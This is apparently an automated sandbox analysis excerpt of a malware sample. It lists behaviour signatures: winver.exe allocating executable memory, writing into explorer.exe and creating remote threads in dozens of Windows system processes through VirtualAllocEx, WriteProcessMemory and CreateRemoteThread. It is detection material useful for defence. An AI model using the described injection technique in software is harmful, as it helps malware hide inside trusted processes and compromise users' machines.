            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 680000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B30000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2870000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2CC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 5A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2C60000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 12F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B50000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2280000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: A50000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: A50000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: FD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: F90000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 600000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1040000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B30000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2C90000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1240000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: AB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: FD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B30000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: FD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: AE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2380000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B80000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 7F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2DD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2F30000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1200000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2CE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B90000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 28C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1220000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 900000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: F10000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 28F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2820000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: F20000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: BE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2D80000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: E30000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: A60000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 29B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 540000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B70000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: EE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 740000 protect: page execute and read and writeJump to behavior
            Contains functionality to inject threads in other processes
            Source: C:\Windows\SysWOW64\winver.exeCode function: 2_2_03390DE0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,2_2_03390DE0
            Source: C:\Windows\explorer.exeCode function: 3_2_01341F8D VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,3_2_01341F8D
            Creates a thread in another existing process (thread injection)
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\explorer.exe EIP: 13408B3Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\sihost.exe EIP: AC090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\svchost.exe EIP: 91090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\svchost.exe EIP: 9A090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\ctfmon.exe EIP: A5090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\explorer.exe EIP: 137090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\svchost.exe EIP: D4090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe EIP: B5090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 11090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe EIP: A9090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: AB090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\smartscreen.exe EIP: 29090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe EIP: 58090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 3D090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 90090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\ApplicationFrameHost.exe EIP: 18090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe EIP: A1090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 19090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\ImmersiveControlPanel\SystemSettings.exe EIP: F1090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\oobe\UserOOBEBroker.exe EIP: 1090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\svchost.exe EIP: D090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\dllhost.exe EIP: 26090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\SysWOW64\cscript.exe EIP: 4D8090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\conhost.exe EIP: 88090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\conhost.exe EIP: 90090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\backgroundTaskHost.exe EIP: C5090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 89090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 3090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe EIP: 153090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe EIP: 277090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe EIP: B8090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe EIP: 8B090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe EIP: B5090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe EIP: 2EB090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe EIP: 2D1090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe EIP: 2B4090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe EIP: 2E2090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: BE090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2CA090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: C4090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 112090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2F4090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: F9090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B3090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2F6090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 307090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 14D090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B9090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B7090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 161090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2C9090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: CC090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 66090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: AD090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 14B090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 101090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: D9090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: F1090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 6E090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 93090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: AD090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 236090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 97090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 105090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 7B090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 102090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 9C090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 85090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: AA090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: CE090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: F7090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: FC090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B4090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 20E090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 68090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B3090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 287090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2CC090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 5A090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2C6090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 12F090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B5090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 228090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: A5090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 1A090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: A5090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: FD090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: F9090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 60090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 104090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B3090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2C9090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 124090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: AB090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: FD090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B3090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: FD090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: AE090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 238090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B8090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 7F090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2DD090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2F3090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 120090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2CE090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B9090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 28C090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 122090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 90090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: F1090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 28F090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 282090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: F2090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: BE090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2D8090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: E3090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: A6090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 29B090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 54090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B7090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: EE090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 74090BJump to behavior
            Source: C:\Windows\explorer.exeThread created: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe EIP: 1C090BJump to behavior
            Source: C:\Windows\explorer.exeThread created: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe EIP: 1C090BJump to behavior
            Injects code into the Windows Explorer (explorer.exe)
            Source: C:\Windows\SysWOW64\winver.exeMemory written: PID: 2580 base: 1340000 value: 50Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: PID: 2580 base: 1370000 value: 50Jump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\java.exeMemory written: C:\Windows\SysWOW64\winver.exe base: 3318B0Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\explorer.exe base: 1340000Jump to behavior
